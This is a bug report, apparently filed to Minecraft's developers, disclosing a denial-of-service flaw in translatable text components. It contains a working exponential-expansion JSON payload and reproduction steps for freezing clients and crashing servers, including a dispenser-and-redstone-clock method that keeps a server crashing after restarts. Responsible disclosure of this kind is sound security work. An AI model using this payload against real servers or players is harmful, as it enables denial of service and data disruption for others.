Yeah, it's me again. This one is way worse than MC-256127.

If it was possible to include past versions, I would have included nearly every modern version of Minecraft, because versions dating all the way back to 1.7.10 are affected. I strongly urge you to fix this as soon as possible, as it can be exploited in so many ways. Both servers and clients are affected by this exploit in some capacity, so I've split this report into sections for servers and clients.

I will be using the component data below as the payload when demonstrating the exploit, but I suspect that it can be strengthened by replacing the "ouch!" text component with something much larger.

{"translate":"%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s","with":[{"translate":"%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s","with":[{"translate":"%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s","with":[{"translate":"%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s","with":[{"text":"ouch!"}]}]}]}]}

Overview

The Translatable text component contains a design flaw where its recursive capabilities can be exploited to create components that when processed, create an output that is exponentially larger than the input. The payload noted above is a mere 1,056 bytes, but the output is somewhere in the hundreds of megabytes. About 26,873,856 placeholders are processed in the payload above.

Clients

Signs, chat messages, title messages, entities, scoreboards, or items can be utilized to instantly freeze clients when they begin to process the components in preparation for rendering. Here's some methods listed below:

• Signs and entities can be utilized to act as a sort of "chunk ban".
• Items can be utilized to instantly freeze clients upon loading a world or hovering over them in a GUI. They can also act as a sort of "inventory ban".
• Books can be utilized to instantly freeze the client of anyone who dares open the book
• Scoreboards, boss bars, titles, and chat messages can be used to instantly freeze clients that receive the messages

Steps to reproduce

DISCLAIMER: Only do this in a world you don't care about.

1. Load in the hotbar.nbt included in the attachments into your .minecraft folder
2. Boot up your client
3. Load up a world
4. Put the sign from the saved hotbars into your inventory
5. Place the sign

Servers

Servers are by far the most vulnerable to this exploit. When the payload is applied to the name of a Wolf that then dies, the server instantly becomes unresponsive as the server fills the disk with hundreds of megabytes of per Wolf.

That may seem bad on its own, but it only gets worse. This exploit can be abused even further by going to the world spawn and putting a spawn egg with the Wolf's data into a dispenser connected to a redstone clock. Because the world spawn is constantly loaded and ticked regardless of whether or not any players are present, the end result is log spam that rapidly increases the log file size to nearly gigabyte levels (especially when you change the "ouch!" text component to something much larger).

Often the server will just outright crash from the watchdog detecting the lockup and stepping in. Not like it would matter for those running a system that automatically restarts servers, as the server will just crash again upon booting up.

On some modded servers where the watchdog is modified to behave differently (not like it would matter to you, but I figured it might be worth documenting), this exploit genuinely causes the JVM to run out of memory just trying to dump everything to disk for logging.

Steps to reproduce

DISCLAIMER: Only do this in a world you don't care about.

1. Load in the hotbar.nbt included in the attachments into your .minecraft folder
2. Boot up your client
3. Connect to the server
4. Put the Wolf Spawn Egg from the saved hotbars into your inventory
5. Place down the spawn egg to spawn the Wolf (this will crash your client in the process!) or do what I noted above and stick it into a dispenser connected to a redstone clock.